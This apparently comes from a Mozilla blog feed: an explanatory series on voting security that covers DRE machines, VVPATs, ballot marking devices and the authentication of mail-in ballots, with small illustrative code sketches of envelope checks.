As I said in Part III, most of the work here was done in the 2000s, so it’s possible that things have improved, but the available evidence suggests otherwise. Moreover, there are limits to how good a job it seems possible to do here.

As with precinct-count machines, there are a number of ways in which an attacker might get enough physical access to the machine in order to attack them. Anyone who has access to the warehouse where the machines are stored could potentially tamper with them. In addition it’s not uncommon for voting machines to be stored overnight at polling places before the election, where you’re mostly relying on whatever lock the church or school or whatever has on its doors. It’s also not impossible that a voter could exploit temporary physical access to a machine in order to compromise it — remember that there usually will be a lot of machines in a given location so it’s hard to supervise them all — but that is a somewhat harder attack to mount.

Viral attacks

However, there is another more serious attack modality: device administration. Prior to each election, DREs need to be initialized with the ballot contents for each contest. The details of how this is done vary: for instance, one might connect them via a cable to the Election Management System (EMS) [–corrected from “Server”], insert a memory stick programmed by the EMS, or sometimes use a local network. In any case, this electronic connection is a potential avenue for attack by an attacker who controls the EMS. This connection can also be an opportunity for a compromised voting machine to attack the EMS. Together, these provide the potential conditions for a virus: an attacker compromises a single DRE and then uses that to attack the EMS, and then uses the EMS to attack every DRE in the jurisdiction. This has been demonstrated on real systems. Here’s Feldman et al. again:

3. AccuVote-TS machines are susceptible to voting-machine viruses—computer
viruses that can spread malicious software automatically and invisibly from
machine to machine during normal pre- and post-election activity. We have
constructed a demonstration virus that spreads in this way, installing our
demonstration vote-stealing program on every machine it infects.

It’s important to remember that this kind of attack is also potentially possible with precinct-count opscan machines: any time you have computers in the polling place you run this risk. The major difference is that with precinct-count opscan machines, you have the paper ballots available so you can recount them without trusting the computer.

Voter Verifiable Paper Audit Trails (VVPAT)

Because of this kind of concern, some DREs are fitted with what’s called a Voter Verifiable Paper Audit Trail (VVPAT). A typical VVPAT is a reel-to-reel thermal printer (think credit card receipts) behind a clear cover that is attached to the voting machine, as in the picture of a Hart voting machine below (the VVPAT is the grey box on the left). [Picture by Joseph Lorenzo Hall].

The typical way this works is that after the voter has made their selections they will be presented with a final confirmation screen. At the same time, the VVPAT will print out a summary of their choices which the voter can check. If they are correct, the voter accepts them. If not, they can go back and correct their choices, and then go back to the confirmation screen. The idea is that the VVPAT then becomes an untamperable — at least electronically — record of the voter’s choices and can be counted separately if there is some concern about the correctness of the machine tally. If everyone did this, then DREs with VVPAT would be software independent (recall our discussion of SI in Part III of this series).

The major problem with VVPATs is that voters make mistakes and they aren’t very good about checking the results. This means that a compromised machine can change the voter’s vote (as if the voter had made a mistake). If the voter doesn’t catch the mistake, then the attacker wins, and if they do, they’re allowed to correct the mistake.[4] We do have some data on this from Bernhard et al., who studied Ballot Marking Devices (BMDs), which are like DREs except that they print out optical scan ballots (see below). They found that if left to themselves around 6.5% of voters (in a simulated but realistic setting) will detect ballots being changed, which is pretty bad. There is some good news here, which is that with appropriate warnings by the “poll workers” the researchers were able to raise the detection rate to 85.7%, though it’s not clear how feasible it is to get poll workers to give those warnings.

Privacy/Secrecy of the Ballot

The DRE privacy/secrecy story is also somewhat disappointing. There are two main ways that the system can leak how a voter voted: via Cast Vote Records (CVRs) and via the VVPAT paper record. A CVR is just an electronic representation of a given voter’s ballot stored on the DRE’s “disk”. In principle, you might think that you could just store the totals for each contest, but it’s convenient to have CVRs around for a variety of reasons, including post-election analysis (looking for undervotes, possible tabulation errors, etc.) In any case, it’s common practice to record them and the Voluntary Voting Systems Guidelines (VVSG) promulgated by the US Election Assistance Commission encourage vendors to do so. This isn’t necessarily a problem if CVRs are handled correctly, but it must be impossible to link a CVR back to a voter. This means they have to be stored in a random order with no identifying marks that lead back to voter sequence. Historically, manufacturers have not always gotten this right, as, for instance, the California TTBR found (See Section 4.4.8 and Section 6.8). These problems can also exist with precinct count optical scan systems, but I forgot to mention it in my post on them. Sorry about that. Even if this part is done correctly, there are risks of pattern voting attacks in which the voter casts their ballot in a specific unique way, though again this can happen with optical scan.

The VVPAT also presents a problem. As described above, VVPATs are typically one long strip of paper, with the result that the VVPAT reflects the order in which votes were cast. An attacker who can observe the order in which voters voted and who also has access to the VVPAT can easily determine how each voter voted. This issue can be mostly mitigated with election procedures which cut the VVPAT roll apart prior to usage, but absent those procedures it represents a risk.

Ballot Marking Devices

The final thing I want to cover in this post is what’s called a Ballot Marking Device (BMD) [also known as an Electronic Ballot Marker (EBM)]. BMDs have gained popularity in recent years — especially with people from the computer science voting security community — as a design that tries to blend some of the good parts of DREs with some of the good parts of paper ballots. For example, the Voting Works open source machine design is a BMD, as is Los Angeles’s new VSAP machine.

A BMD is conceptually similar to a DRE but with two important differences:

  1. It doesn’t have a VVPAT but instead prints out a ballot which can be fed into an optical scanner.
  2. Because the actual ballot counting is done by the scanner, you don’t need the machine to count votes, so it doesn’t need to store CVRs or maintain vote totals.

BMDs address the privacy issues with DREs fairly effectively: you don’t need to store CVRs in the machine and the ballots are to some extent randomized in the ballot boxes and handling process. They also partly address the scaling issues: while BMDs aren’t any cheaper, if a long line develops you can fall back to hand-marked optical scan ballots without disrupting any of your back-end processes.

It’s less clear that they address the security issues: a compromised BMD can cheat just as much as a compromised DRE and so they still rely on the voter checking their ballot. There have been some somewhat tricky attacks proposed on DREs where the attacker controls the printer in a way that fools the user about the VVPAT record and these can’t be mounted with a BMD, but it’s not clear how practical those attacks are in any case. Probably the biggest security advantage of a BMD is that you don’t need to worry about trusting the machine count or the communications channel back from the machine: you just count the opscan ballots without having to mess around with the VVPAT.[5] And of course because they’re fundamentally just a mechanism for printing paper ballots, it’s straightforward to fall back to paper in case of failure or long lines.

Up Next: Post-Election Audits

We’ve now covered all the major methods used for casting and counting votes. That’s just the beginning, though: if you want to have confidence in an election you need to be able to audit the results. That’s a topic that deserves its own post.


  1. For instance, Santa Clara county produces ballots in English, Chinese, Spanish, Tagalog, Vietnamese, Hindi, Japanese, Khmer, and Korean. ↩
  2. Punch cards are an old system with some interesting properties. The voter marks their ballot by punching holes in a punch card. The card itself has no candidates written on it but is instead inserted into a holder that lists the contests and choices. The card itself is then read by a standard punch card reader. This seems like it ought to be fairly straightforward but went wrong in a number of ways in Florida due to a combination of poor ballot design and an unfortunate technical failure mode: it was possible to punch the cards incompletely and as the voting machine filled up with chads (the little pieces of paper that you punched out), it would sometimes become harder to punch the ballot completely. This resulted in a number of ballots which had partially detached (“hanging”) chads or just dimpled chads, leading to debates about how to interpret them. Wikipedia has a pretty good description of what happened here. ↩
  3. At least they should be obvious: It’s incredibly hard to write software that can resist compromise by a dedicated attacker who has direct access (this is why you have to keep upgrading your browser and operating system to fix security issues). Given the critical nature of voting machines, you really don’t want them attached to the Internet. ↩
  4. In principle, this might leave statistical artifacts, such as a higher rate of correcting from Smith -> Jones than Jones -> Smith, but it would take a fair amount of work to be sure that this wasn’t just random error. ↩
  5. We’ve touched on this a few times, but one of the real advantages of paper ballots is that they serve as a single common format for votes. Once you have that format, it’s possible to have multiple methods for writing (by hand, BMD) and reading (by hand, central count opscan, precinct count opscan) the ballots. That gives you increased flexibility because it means that you can innovate in one area without affecting others, as well as allowing either the writing side (voters) or reading side (election officials) to change its processes without affecting the other. This is a principle with applicability far beyond voting. Interoperable standardized data formats and protocols are a basic foundation of the Internet and the Web and much of what has made the rapid advancement of the Internet possible. ↩

Why getting voting right is hard, Part IV: Absentee Voting and Vote By Mail https://blog.mozilla.org/en/mozilla/why-getting-voting-right-is-hard-part-iv-absentee-voting-and-vote-by-mail/ Wed, 13 Jan 2021 23:32:00 +0000 https://blog.mozilla.org/foxtail/?p=64535 This is the fourth post in my series on voting systems. Part I covered requirements and then Part II and Part III covered in-person voting using paper ballots. However, paper ballots don’t need to be voted in person; it’s also possible to have people mail in their ballots, in which case they can be counted […]


This is the fourth post in my series on voting systems. Part I covered requirements and then Part II and Part III covered in-person voting using paper ballots. However, paper ballots don’t need to be voted in person; it’s also possible to have people mail in their ballots, in which case they can be counted the same way as if they had been voted in person.

Mail-in ballots get used in two main ways:

  • Absentee Ballots: Inevitably, some voters will be unavailable on election day. Even with early voting, some voters (e.g., students, people living overseas, members of the military, people on travel, etc.) might be out of town for weeks or months. In many cases, some or all these voters are still eligible to vote in the jurisdiction in which they are nominally residents even if they aren’t physically present. The usual procedure is to mail them a ballot and let them mail it back in.
  • Vote By Mail (VBM): Some jurisdictions (e.g., Oregon) have abandoned in-person voting entirely; they mail every registered voter a ballot and have them mail it back.

From a technical perspective, absentee ballots and vote-by-mail work the same way; it’s just a matter of which sets of voters vote in person and which don’t. The lines also blur somewhat in that some jurisdictions require a reason to vote absentee whereas others allow anyone to request an absentee ballot (“no-excuse absentee”). Of course, in a vote-by-mail-only jurisdiction voters don’t need to take any action to get mailed a ballot. For convenience, I’ll mostly be referring to all of these procedures as mail-in ballots.

As mentioned above, counting mail-in ballots is the same as counting in-person ballots. In fact, in many cases jurisdictions will use the same ballots in each case, so they can just hand count them or run them through the same optical scanner as they would with in-person voted ballots, which simplifies logistics considerably. The major difference between in-person and mail-in voting is the need for different mechanisms to ensure that only authorized voters vote (and that they only vote once). In an in-person system, this is ensured by determining eligibility when voters enter the polling place and then giving each voter a single ballot, but this obviously doesn’t work in the case of mailed-in ballots — it’s way too easy for an attacker to make a pile of fake ballots and just mail them in — so something else is needed.

Authenticating Ballots

As with in-person voting, the basic idea behind securing mail-in ballots is to tie each ballot to a specific registered voter and ensure that every voter votes once.

If we didn’t care about the secrecy of the ballot, the easy solution would be to give every voter a unique identifier (Operationally, it’s somewhat easier to instead give each ballot a unique serial number and then keep a record of which serial numbers correspond to each voter, but these are largely equivalent). Then when the ballots come in, we check that (1) the voter exists and (2) the voter hasn’t voted already. When put together, these checks make it very difficult for an attacker to make their own ballots: if they use non-existent serial numbers, then the ballots will be rejected, and if they use serial numbers that correspond to some other voter’s ballot then they risk being caught if that voter voted. So, from a security perspective, this works reasonably well, but it’s a privacy disaster because it permanently associates a voter’s identity with the contents of their ballots: anyone who has access to the serial number database and the ballots can determine how individual voters voted.
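
A sketch of those two checks, using made-up types rather than any real election system’s code:

```typescript
// Invented voter-roll record keyed by the serial number mailed to each voter.
interface VoterRecord {
  serial: string;
  hasVoted: boolean;
}

function acceptEnvelope(serial: string, roll: Map<string, VoterRecord>): boolean {
  const record = roll.get(serial);
  if (!record) return false;         // check 1: no such voter/serial, reject
  if (record.hasVoted) return false; // check 2: already voted, set aside for review
  record.hasVoted = true;            // a second envelope with this serial now fails
  return true;                       // envelope goes on to the counting pile
}
```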

The solution turns out to be to authenticate the envelopes, not the ballots. The way that this works is that each voter is sent a non-unique ballot (i.e., one without a serial number) and then an envelope with a unique serial number. The voter marks their ballot, puts it in the envelope and mails it back. Back at election headquarters, election officials perform the two checks described above. If they fail, then the envelope is set aside for further processing. If they succeed, then the envelope is emptied — checking that it only contains one ballot — and put into the pile for counting.

This procedure provides some level of privacy protection: there’s no single piece of paper that has both the voter’s identity and their vote, which is good, but at the time when election officials open the ballot they can see both the voter’s identity and the ballot, which is bad. With some procedural safeguards it’s hard to mount a large scale privacy violation: you’re going to be opening a lot of ballots very quickly and so keeping track of a lot of people is impractical, but an official could, for instance, notice a particular person’s name and see how they voted.[1] Some jurisdictions address this with a two envelope system: the voter marks their ballot and puts it in an unmarked “secrecy envelope” which then goes into the marked envelope that has their identity on it. At election headquarters officials check the outer envelope, then open it and put the sealed secrecy envelope in the pile for counting. Later, all of the secrecy envelopes are opened and counted; this procedure breaks the connection between the voter’s identity and their ballot.[2]
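
Continuing the sketch above, the two-envelope flow separates the identity check from the counting step, with a shuffle standing in for the batching that breaks the ordering link. Again, the types are invented for illustration.

```typescript
interface InnerEnvelope { ballot: string }                     // no identifying marks
interface OuterEnvelope { serial: string; inner: InnerEnvelope }

function processBatch(
  batch: OuterEnvelope[],
  roll: Map<string, { hasVoted: boolean }>
): InnerEnvelope[] {
  const accepted: InnerEnvelope[] = [];
  for (const env of batch) {
    const rec = roll.get(env.serial);
    if (!rec || rec.hasVoted) continue; // set aside for further processing
    rec.hasVoted = true;
    accepted.push(env.inner);           // identity stays with the outer envelope
  }
  // Fisher-Yates shuffle so the counting order no longer matches check-in order.
  for (let i = accepted.length - 1; i > 0; i--) {
    const j = Math.floor(Math.random() * (i + 1));
    [accepted[i], accepted[j]] = [accepted[j], accepted[i]];
  }
  return accepted; // only anonymous inner envelopes move on to counting
}
```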

Signature Matching

The basic idea behind the system described above is to match ballots mailed out (which are tied to voter registration) to ballots mailed in. This works as long as there’s no opportunity for attackers to substitute their own ballots for those of a legitimate voter. There are a number of ways that might happen, including:

  • Stealing the ballot in the mail, either on the way out to the voter or when it is sent back to election headquarters. Stealing the ballot on the way back works a lot better because if voters don’t receive their ballots they might ask for another one, in which case you have duplicates.
  • Inserting fake ballots for people who you don’t expect to vote. This is obviously somewhat risky, as they might decide to vote and then you would have a duplicate, but many people vote infrequently and therefore have a reduced risk of creating a duplicate ballot.

Again, I’m assuming that the attacker can make their own ballots and envelopes. This isn’t trivial, but neither is it impossible, especially for a state-level actor.

Some jurisdictions attempt to address this form of attack by requiring voters to sign their ballot envelopes. Those envelopes can then be compared to the voter’s known signature (for instance on their voter registration card). Some jurisdictions go further, requiring a witness to sign the envelope as well — affirming the identity of the person signing it — requiring the voter to include a copy of their ID, or even requiring the ballot envelope to be notarized. The requirements vary radically between jurisdictions (see here for a table of how this works in each state). To the best of my knowledge, there’s no real evidence that this kind of signature validation provides significantly more defense against fraud. From an analytic perspective, the level of protection depends on the capabilities of an attacker and the detection methods used by election officials. For instance, an attacker who steals your ballot on the way back could potentially try to duplicate your signature (after all, it’s on the envelope!), which seems reasonably likely to work, but an attacker who is just trying to impersonate people who didn’t vote might have some trouble because they wouldn’t know what your signature looked like.

Ballots with Errors

It’s not uncommon for the returned ballots to have some kind of error, for instance:

  • Voter used their own envelope instead of the official envelope
  • Voter didn’t use the secrecy envelope
  • Voter didn’t sign the envelope
  • Voter signature doesn’t match
  • Envelope not notarized.
  • Overvotes
  • Damaged ballots (torn ballots, ballots with stains, etc.)

Each of these can potentially lead to a voter’s ballot being rejected. Moreover, the more requirements a voter’s ballot has to meet, the greater chance that it will be rejected, so there is a need to balance the additional security and privacy provided by extra requirements against the additional risk of rejecting ballots which are actually legitimate, but just nonconformant. Different jurisdictions have made different tradeoffs here.

Just because a ballot has a problem doesn’t mean that the voter is necessarily out of luck: some jurisdictions have what’s called a cure process in which the election officials reach out to the voter whose name is on the ballot and offer them an opportunity to fix their ballot, with the fix depending on the jurisdiction and the precise problem. Some jurisdictions just discard the ballot, for example in the case of “naked ballots” — ballots where voters did not use the inner secrecy envelope.

Of course, not all problems can be cured. In particular, once the ballot has been disassociated from the envelope, then there’s no way to go back to the voter and get them to fix an error such as an overvote. This issue isn’t unique to vote-by-mail, however: it also occurs with voting systems using central-count optical scanners (see Part III). In general, if the ballots are anonymized before processing, then it’s not really possible to fix any errors in them; you just need to process them the best you can.

Ballot rejection is an opportunity for some level of insider attack: although voting officials do not know how individuals voted, they might be able to know which voters are likely to vote a certain way, perhaps by looking at their address or party affiliation (this is easier if the voter’s name is on the ballot, not just a serial number) and more strictly enforce whatever security checks are required for ballots they think will go the wrong way. Having external observers who are able to ensure uniform standards can significantly reduce the risk here.

Voting Twice

There are a number of situations in which multiple ballots might have been or will be cast for the same voter. A number of these are legitimate, such as a voter changing their mind after they voted by mail and deciding to vote in person — perhaps because they changed their mind about candidates or because they are worried their absentee ballot will not be processed in time — but of course they could also be the result of error or fraud. There are two basic ways in which double voting shows up:

  • Two mail-in ballots
  • One mail-in ballot and one in-person ballot

In the case of two mail-in ballots, it’s most likely that the first ballot has already been taken out of the envelope, so there’s no real way not to count it. All you can do is not count the second ballot. Note that this means that if an attacker manages to successfully submit a ballot for you and gets it in before you, then their vote will count and yours will not. Fortunately, this kind of fraud is rare and detectable and once detected can be investigated. I’m not aware of any election where fake mail-in ballots have materially impacted the results.

The more complicated case is when a voter has had a mail-in ballot sent to them but then decides to vote in person, which can happen for a number of reasons. For instance, the ballot might have been lost in the mail (in either direction). This situation is different because we need to prevent double voting but poll workers don’t know whether the voter also submitted their ballot by mail. If the voter were allowed to vote as usual, you might end up in a situation where the mail-in ballot had already been processed (at least as far as removing it from the envelope) and there was no way to remove either ballot, because they’re both unidentified ballots mixed with other ballots. Instead, the standard process is to require the voter to fill in what’s called a provisional ballot, which is physically like a mail-in ballot except that it has a statement about what happened. Provisional ballots are segregated from regular ballots, so once the rest of the ballots have been processed you can go through the provisionals and process those for voters whose ordinary mail-in ballots have not been received/counted.[3]

Returned Ballot Theft

Another source of attack on mail-in ballots — as well as ballot drop-boxes — is theft of the ballots en route to election headquarters. In-person voting has a number of accounting mechanisms designed to ensure that the number of voters matches the number of cast ballots which then matches the number of recorded votes, but these don’t work for mail-in ballots because many people who are sent ballots will fail to return them. In many jurisdictions, voters are able to track their ballots and see if they have been processed, and could vote in person if their ballots are lost. However, as a practical matter, many voters will not do this. The major defense against this kind of attack is good processes around mail delivery and drop-box security as well as post-hoc investigation of reports of missing ballots.

Secrecy of the Ballot

With proper processes at election headquarters, the ballot secrecy properties of mail-in ballots are comparable to in person voting, with one major exception: with mail-in ballots it is much easier for a voter to demonstrate to a third party how they voted. All they have to do is give the ballot to that third party and let them fill it out and mail it (perhaps signing the envelope first). This allows for vote buying/coercion type attacks. This isn’t ideal, but it’s a difficult attack to mount at a large scale because the attacker needs to physically engage with each voter.

The cost of security

As noted above, many states have fairly extensive verification mechanisms for mail-in ballots. These mechanisms are not free, either to voters or to election officials. In particular, requirements such as notarization increase the cost of voting and thus may deter some voters from voting. Even apparently lightweight requirements such as signature matching have the potential to cause valid ballots to be rejected: some people will forget to sign their name, people do not sign their name the same way every time, and election officials are not experts on handwriting, so we should expect that they will reject some number of valid ballots. Cottrell, Herron and Smith report about 1% of ballots being rejected for some kind of signature issue, with Black and Hispanic voters seemingly having higher rates of rejection than White voters. Because real fraud is rare and errors are common, the vast majority of rejected ballots will actually be legitimate.[4]

There is a more general point here: although mail-in ballots seem insecure (and this has been a point of concern in the voting security community), real studies of mail-in ballots show that they have extremely low fraud rates. This means that policy makers have to weigh potential security issues with mail-in voting against their impact on legitimate voters. The current evidence suggests that mail-in voting modestly increases voting rates (experience from Oregon suggests by about 2-5 percentage points).[5] The implication is that making mail-in voting more difficult — whether by restricting it or by adding hard-to-follow security requirements — is likely to decrease the number of accepted ballots while only having a small impact on voting fraud.

Up Next: Direct Recording Electronic systems and Ballot Marking Devices

OK. Three posts on paper ballots seems like enough for now, so it’s time to turn to more computerized voting methods. The other major form of voting in the United States uses what’s called the “Direct Recording Electronic” (DRE) voting system which just means that you vote directly on a computer which internally keeps track of the votes. DRE machines are very popular but have been the focus of a lot of concern from a security perspective. We’ll be covering them next, along with a similar seeming but much better system called a “Ballot Marking Device” (BMD). BMDs are like DREs but they print out paper ballots that can then be counted either by hand or with optical scanners.


  1. In this version, the ballots can just have numbers and not names, but as we’ll see below, many jurisdictions require names. ↩
  2. People familiar with computer privacy will recognize this technique from technologies such as proxies, VPNs, or mixnets. ↩
  3. Provisional ballots are also used for a number of other exception cases such as voters who go to the wrong polling place (here again, it’s hard to tell if they tried to vote at multiple polling places) or voters who claim to be registered but can’t be found on the voters list (this often looks the same to precinct-level officials because each precinct usually just has their own list of voters). ↩
  4. This dynamic is quite common when adding new security checks: any check you add will generally have false positives. In environments where most behavior is innocent, that means that most of the behavior you catch will also be innocent. Bruce Schneier has written extensively about this point. ↩
  5. While mail-in voting generally seems to increase turnout by reducing barriers to voting, there are a number of populations that find mail-in ballots difficult. One obvious example is people with disabilities, who may find filling in paper ballots difficult. Less well-known is that Native Americans experience special challenges that make exclusive vote-by-mail difficult. Thanks to Joseph Lorenzo Hall for informing me on this point. ↩
